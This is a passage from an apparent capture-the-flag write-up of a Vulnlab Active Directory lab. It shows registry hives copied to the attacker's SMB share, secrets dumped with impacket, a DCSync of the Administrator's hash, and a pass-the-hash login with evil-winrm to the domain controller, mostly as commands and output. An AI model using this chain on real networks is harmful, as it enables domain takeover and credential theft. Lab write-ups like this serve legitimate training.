[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save
Now get the machine hashes:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 …~…..9….$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF……..r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z…&.m…….
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 …?..^……$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
Get the users' hashes:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
evil-winrm to the DC:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
That was fun!